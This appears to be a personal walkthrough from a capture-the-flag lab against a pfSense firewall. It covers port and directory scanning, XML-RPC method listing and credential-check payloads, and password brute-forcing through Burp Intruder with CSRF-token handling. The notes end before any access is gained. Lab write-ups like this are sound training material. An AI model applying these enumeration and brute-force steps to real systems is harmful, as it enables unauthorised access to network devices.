Skip to content

10.10.10.60

Recon

Port Scan

PORT    STATE SERVICE  VERSION                                                                                                                                               80/tcp  open  http     lighttpd 1.4.35                                                                                                                                       443/tcp open  ssl/http lighttpd 1.4.35

Enumerate attack surface

Webserver - 80: lighttpd 1.4.35 (http) - 443: lighttpd 1.4.35 (https)

Public exploits.

Pasted image 20220203163137.png

A closer look at the webserver

Pasted image 20220203165217.png

pfSense? Is that you? Pasted image 20220203172112.png

Findings from the scan.

└─$ cat */*ferox* | grep -E '^200' | sort -u                                                                                                                                 200       10l       40w      271c https://10.10.10.60/changelog.txt                                                                                                          200      173l      425w        0c https://10.10.10.60/                                                                                                                       200      173l      425w        0c https://10.10.10.60/edit.php                                                                                                               200      173l      425w        0c https://10.10.10.60/exec.php                                                                                                               200      173l      425w        0c https://10.10.10.60/graph.php                                                                                                              200      173l      425w        0c https://10.10.10.60/help.php                                                                                                               200      173l      425w        0c https://10.10.10.60/index.php                                                                                                              200      173l      425w        0c https://10.10.10.60/interfaces.php                                                                                                         200      173l      425w        0c https://10.10.10.60/license.php                                                                                                            200      173l      425w        0c https://10.10.10.60/pkg.php                                                                                                                200      173l      425w        0c https://10.10.10.60/stats.php                                                                                                              200      173l      425w        0c https://10.10.10.60/status.php                                                                                                             200      173l      425w        0c https://10.10.10.60/system.php                                                                                                             200      173l      425w        0c https://10.10.10.60/wizard.php                                                                                                             200       17l       26w      384c https://10.10.10.60/xmlrpc.php                                                                                                             200       24l       32w      329c https://10.10.10.60/index.html                                                                                                             200        7l       24w     1406c https://10.10.10.60/favicon.ico

Most of those pages were behind a login page. I could only access - changelog.txt - which mentions a recent patch FAILED, only patches 2 of 3 vulnerabilities. Pasted image 20220203173133.png

  • xmlrpc.php - which shows some XML error (probably because I'm doing a get request and it's expecting a POST with some command.) Pasted image 20220203175941.png Following HackTricks guide to xmlrpc I was able to get a list of valid commands. This can be used to brute-force creds if needed.

Do a POST with this payload:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Pasted image 20220203182332.png

While researching how to use pfsense's XMLRPC, I came across this exploit. The exploit requires credentials, but grants RCE. More about this weakness at NVD

It looks like the exploit is using this XML payload to check the credential (only password I guess?).

<?xml version='1.0' encoding='iso-8859-1'?>"
<methodCall>
<methodName>pfsense.host_firmware_version</methodName>
<params>
<param><value><string>PASSWORD_HERE</string></value></param>
</params>
</methodCall>

So I will check this, and brute-force if possible.

Pasted image 20220203183754.png

Appears to be working! (Incorrect password)

Pasted image 20220203183855.png

Now for the brute-force.... Well, that was short lived. 75 requests worked, but now everything is timing out. In fact, it appears the whole webserver is down now. Wait....duh....my IP is probably deny-listed

:'(

Reverting...Will have to do something different for the brute-force attack. I could try the name of the box as the password...

Also just noticed, lighttpd has some DOS vulnerability, apparently the requests are just going to quickly for it to handle. If I slow them down maybe my brute force will get past 80 requests :)

  • index.html - which has a link to install Dragon Fly BSD Pasted image 20220203180039.png

I crashed the damn thing again.... Moving to another box, may have to revert this when I come back - sort of jumped right in and skipped enumerating the attack surface, maybe take a step back when I come back to it.

After reverting, and scouring the internet, the above screenshot seems to be tied to v 2.1.5 of pfsense.

Pasted image 20220204084646.png]

After reviewing the exploits on here, I've come full circle. I'm back at the XMLRPC exploit, but I still need credentials. Maybe I can modify the python exploit to brute force as well.

Downloading this exploit

Split the file: lines 1-90 in info.txt and 91+ in pfsense-rce.py

This still isn't working.....maybe I can bypass the session thing on longin page using burp. I found some notes about using Intruder to update dynamic session values during a brute force, this may be the ticket.

Identifying changing values

Reply 31

set cookie_test Pasted image 20220204104146.png set __csrf_magic Pasted image 20220204104307.png

Request 32

updated cookie_test Pasted image 20220204104426.png updated__csrf_magic Pasted image 20220204104504.png is URL encoded

Using Burp Intruder, with the following positions set, username is always admin:

Pasted image 20220204104836.png

Then set up Grep - Extract in Options to get around the session management: Pasted image 20220204105447.png

Now to set payloads: Pasted image 20220204105616.png Note: for payload 2, I've added , to the Payload Encoding char list. Pasted image 20220204105758.png

For the wordlist, I've decided to use rockyou.txt - this has stalled burp while it loads

Pasted image 20220204110232.png

Trying to run this is causing my CPU to spike pretty heavily - Pasted image 20220204110635.png -

Times up....